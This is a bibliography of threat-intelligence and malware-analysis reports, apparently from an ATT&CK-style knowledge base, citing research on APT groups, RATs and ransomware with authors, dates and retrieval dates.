- Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
- Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.
- Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.
- Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.
- Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.
- Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
- Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.
- Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.
- Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.
- US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.
- Miller-Osborn, J. and Grunzweig, J.. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieved March 30, 2017.
- Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.
- Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
- Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
- Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.
- Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
- Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
- Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.
- Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.
- Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.
- Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.
- Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.
- Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.
- Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.
- Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
- hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.
- Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.
- Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.
- Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
- McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.
- Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.
- Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.
- Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.
- Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
- SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.
- Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.
- FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.
- Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.
- Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
- Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
- FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.
- FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
- Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.
- Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.
- PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
- Twi1ight. (2015, July 11). AD-Pentest-Script - wmiexec.vbs. Retrieved June 29, 2017.
- Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.
- Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
- Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.
- US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
- US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.
- Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.
- Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.
- Falcone, R. and Lancaster, T.. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
- DiMaggio, J.. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016.
- Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
- Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.
- Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
- Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
- Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
- ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018.
- FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
- Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
- Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
- Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
- Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.
- Shelmire, A. (2015, July 06). Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels. Retrieved November 15, 2018.
- Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.
- Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.
- Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.
- Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.
- GReAT. (2017, November 1). Silence – a new Trojan attacking financial organizations. Retrieved May 24, 2019.
- Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.
- Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.
- Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.
- Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.
- Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
- Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.
- Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.
- Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
- Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.
- Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.
- Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018.
- Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.
- Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.
- Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
- Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
- Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.
- US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.
- Falcone, R. and Lee, B. (2017, July 27). OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group. Retrieved January 8, 2018.
- Falcone, R., Wilhoit, K.. (2018, November 16). Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery. Retrieved April 23, 2019.
- Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
- Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.
- Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.